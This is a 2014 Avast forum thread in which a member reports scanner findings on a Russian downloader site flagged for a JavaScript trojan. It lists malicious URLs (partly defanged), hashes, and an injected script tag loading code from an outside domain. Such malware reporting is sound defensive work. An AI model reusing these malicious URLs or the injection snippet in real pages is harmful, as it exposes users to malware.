Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
avast! Web Shield blocks site |{gzip} as with JS:GwLoadA[Trj]
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: avast! Web Shield blocks site |{gzip} as with JS:GwLoadA[Trj] (Read 1810 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 33897
malware fighter
avast! Web Shield blocks site |{gzip} as with JS:GwLoadA[Trj]
«
on:
May 22, 2014, 06:34:46 PM »
See:
http://app.webinspector.com/public/reports/show_website?site=http%3A%2F%2Fwww.neodownloader.ru
Trojan detected in: Object: htxp://feelthesame.changeip.name/rsize.js ->
https://www.virustotal.com/nl/url/a4f44a49dc920a577790d24789ba6bda4c6e838ea05f54fe56d5f8393718cd3a/analysis/
and
http://urlquery.net/report.php?id=1395535056539
IDS alert Detected a Dynamic DNS URL
SHA1: d6d01e38799a81f875259708da406ef5dbfd24fe
Name: TrojWare.JS.iFrame.DEE
See:
http://sitecheck.sucuri.net/results/www.neodownloader.ru#blacklist-status
6 instances of
http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?v7
in index.html
Javascript check = Suspicious
image().src = "//counter.yadro dot ru/hit?r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colordepth? screen.colordepth...
Included scripts = Suspect - please check list for unknown includes
htxp://buysitka.com/6jyj4fub.php
htxp://buysitka.com/6jyj4fub.php
For that included script re: Offensive html code:
<script src="htxp://buysitka.com/6jyJ4fuB.php" type="text/javascript">
Offensive url: htxp://buysitka.com/6jyJ4fuB.php
Url is blacklisted in Google Safe Browsing
dragspelsnytt dot se is on 89.221.250.15
ASN for 89.221.250.15: 3301
89.221.250.15 manually set to use abuse@aname.net (this site was also infested by this and reported by
http://sakrare.ikyon.se/
For external links check etc. see:
http://zulu.zscaler.com/submission/show/dcd5eb466d075d34e4ee243e14bf5333-1400775721
100/100% malicious
Missed here:
http://www.avgthreatlabs.com/website-safety-reports/domain/neodownloader.ru/
polonus
«
Last Edit: May 22, 2014, 06:46:21 PM by polonus
»
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 33897
malware fighter
Re: avast! Web Shield blocks site |{gzip} as with JS:GwLoadA[Trj]
«
Reply #1 on:
May 22, 2014, 10:28:16 PM »
A more recent scan:
https://www.virustotal.com/en-gb/url/a4f44a49dc920a577790d24789ba6bda4c6e838ea05f54fe56d5f8393718cd3a/analysis/1400789767/
https://www.virustotal.com/en-gb/file/b2e49d98566fc1934df0349560dfca12e2416dfa10745e6cb65b756cf84fb225/analysis/1400789771/
Thanks go to Pondus for making me aware of the more recent results,
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
avast! Web Shield blocks site |{gzip} as with JS:GwLoadA[Trj]
